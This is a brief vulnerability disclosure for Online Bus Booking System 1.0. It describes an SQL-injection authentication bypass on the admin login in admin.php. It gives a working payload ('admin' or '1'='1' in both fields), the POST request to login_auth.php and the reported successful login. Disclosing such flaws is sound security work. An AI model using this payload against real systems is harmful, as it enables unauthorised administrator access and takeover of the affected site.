
Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.


Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.

#Vendor - SourceCodester

#Product -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Vulnerability Type - Authentication Bypass

#Affected Component - bus_booking/admin.php

#Attack Type- Local

#Privilege Escalation - true

#Impact Code execution - true

Attack Vector

  1. Go to Admin Login Panel and try to bypass

  2. In request payload, set

    username : admin' or '1'='1

    password : admin' or '1'='1

POST /bus_booking/login_auth.php HTTP/1.1

Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0


Successfull logged in to Admin Dashboard